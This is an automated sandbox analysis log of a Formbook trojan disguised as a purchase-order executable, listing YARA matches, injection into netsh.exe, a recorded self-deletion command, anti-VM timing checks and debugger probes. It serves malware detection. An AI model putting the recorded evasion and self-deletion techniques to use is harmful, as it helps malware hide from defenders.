Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FF900
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012199BF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012CE824
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A830
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B1002
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012220A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C20A8
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0120B090
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C28EC
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C2B28
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121A309
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121AB40
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122EBB0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012A23E3
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B03DA
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012BDBD2
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122ABD8
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012AFA2B
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C22AE
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4AEF
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C2D07
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F0D20
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C1D55
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01222581
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B2D82
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0120D5E0
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C25DD
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0120841F
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012BD466
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B4496
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C1FF1
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012CDFCE
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01216E30
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012BD616
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012C2EF7
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0394EBB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D03DA
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0394ABD8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039DDBD2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039C23E3
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A309
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039E2B28
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393AB40
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039E22AE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4AEF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039CFA2B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039399BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0391F900
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03934120
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0392B090
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039420A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039E20A8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039E28EC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D1002
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0393A830
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039EE824
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039EDFCE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039E1FF1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039E2EF7
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039DD616
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03936E30
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03942581
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039E25DD
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0392D5E0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039E2D07
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_03910D20
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039E1D55
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039D4496
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0392841F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_039DD466
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DD8A40
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DD8A3B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DEC16E
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DD2FB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DEBF03
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DD2D90
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DD2D8A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DEC52F

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: String function: 00871820 appears 38 times
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: String function: 011FB150 appears 133 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 0391B150 appears 124 times

Source: Purchase Order 40,7045.exe, 00000000.00000003.234862655.00000000023D6000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order 40,7045.exe
Source: Purchase Order 40,7045.exe, 00000001.00000002.269100880.00000000012EF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order 40,7045.exe
Source: Purchase Order 40,7045.exe, 00000001.00000002.268943802.00000000011AC000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamenetsh.exej% vs Purchase Order 40,7045.exe

Source: 00000001.00000002.268815779.0000000000D00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.268815779.0000000000D00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.268789568.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.268789568.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.498785295.00000000036C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.498785295.00000000036C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.497600988.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.238738017.00000000009A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.238738017.00000000009A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.263471520.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.498889826.00000000036F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.498889826.00000000036F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Purchase Order 40,7045.exe.9a0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Purchase Order 40,7045.exe.9a0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Purchase Order 40,7045.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.Purchase Order 40,7045.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Purchase Order 40,7045.exe.9a0000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Purchase Order 40,7045.exe.9a0000.3.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Purchase Order 40,7045.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.Purchase Order 40,7045.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/0@16/13

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6096:120:WilError_01

Source: Purchase Order 40,7045.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Purchase Order 40,7045.exe	Virustotal: Detection: 40%
Source: Purchase Order 40,7045.exe	ReversingLabs: Detection: 33%

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe

File read: C:\Users\user\Desktop\Purchase Order 40,7045.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Purchase Order 40,7045.exe 'C:\Users\user\Desktop\Purchase Order 40,7045.exe'
Source: unknown	Process created: C:\Users\user\Desktop\Purchase Order 40,7045.exe C:\Users\user\Desktop\Purchase Order 40,7045.exe
Source: unknown	Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Process created: C:\Users\user\Desktop\Purchase Order 40,7045.exe C:\Users\user\Desktop\Purchase Order 40,7045.exe
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045.exe'

Source: Purchase Order 40,7045.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: netsh.pdb source: Purchase Order 40,7045.exe, 00000001.00000002.268930422.0000000001190000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: Purchase Order 40,7045.exe, 00000000.00000003.233625901.0000000002450000.00000004.00000001.sdmp, Purchase Order 40,7045.exe, 00000001.00000002.268948939.00000000011D0000.00000040.00000001.sdmp, netsh.exe, 00000003.00000002.499126985.00000000038F0000.00000040.00000001.sdmp
Source:	Binary string: netsh.pdbGCTL source: Purchase Order 40,7045.exe, 00000001.00000002.268930422.0000000001190000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Purchase Order 40,7045.exe, netsh.exe

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe

Code function: 0_2_00879B2F LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_00871865 push ecx; ret
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_008864B9 push eax; ret
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_00886538 push eax; ret
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_0086BF4F push ecx; ret
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00415913 push edx; retf
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0041AC62 push D8D19732h; iretd
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00414D57 push esi; retf
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0041AD65 push eax; ret
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00414DEA push eax; ret
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0041ADB2 push eax; ret
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0041ADBB push eax; ret
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00414E7E push eax; ret
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0041AE1C push eax; ret
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_00414E24 push eax; ret
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0040FF92 push 00000033h; iretd
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0124D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_0396D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DE5913 push edx; retf
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DE4E7E push eax; ret
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DEAE1C push eax; ret
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DE4E24 push eax; ret
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DDFF92 push 00000033h; iretd
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DEAC62 push D8D19732h; iretd
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DE4DEA push eax; ret
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DEADBB push eax; ret
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DEADB2 push eax; ret
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DE4D57 push esi; retf
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 3_2_02DEAD65 push eax; ret

Source: C:\Windows\SysWOW64\netsh.exe

Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	RDTSC instruction interceptor: First address: 00000000004083D4 second address: 00000000004083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	RDTSC instruction interceptor: First address: 000000000040876E second address: 0000000000408774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 0000000002DD83D4 second address: 0000000002DD83DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 0000000002DD876E second address: 0000000002DD8774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe

Code function: 1_2_004086A0 rdtsc

Source: C:\Windows\explorer.exe TID: 5720	Thread sleep time: -70000s >= -30000s
Source: C:\Windows\SysWOW64\netsh.exe TID: 6852	Thread sleep time: -50000s >= -30000s

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\netsh.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\netsh.exe	Last function: Thread delayed

Source: explorer.exe, 00000002.00000000.250239120.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000002.00000000.250239120.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000002.00000000.249688843.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000002.00000000.250034592.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.250316069.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000002.00000000.252788264.000000000F640000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&r
Source: explorer.exe, 00000002.00000002.506854506.0000000004E61000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000002.00000000.250239120.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000002.00000000.250239120.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000002.00000000.250316069.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000002.00000002.508086144.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000002.00000000.249688843.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000000.249688843.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000002.00000000.252834409.000000000F685000.00000004.00000001.sdmp	Binary or memory string: lume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATAq
Source: explorer.exe, 00000002.00000000.249688843.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\netsh.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe

Code function: 1_2_004086A0 rdtsc

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe

Code function: 1_2_00409900 LdrLoadDll,

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe

Code function: 0_2_0086F175 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe

Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_00861FA0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_00887A30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_008885C4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_00888524 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 0_2_00888561 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01214120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01214120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01214120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01214120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_01214120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0122513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011F9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_0121B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_011FC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012769A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012261A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012261A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012B49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Purchase Order 40,7045.exe	Code function: 1_2_012751BE mov eax, dword ptr fs:[00000030h]
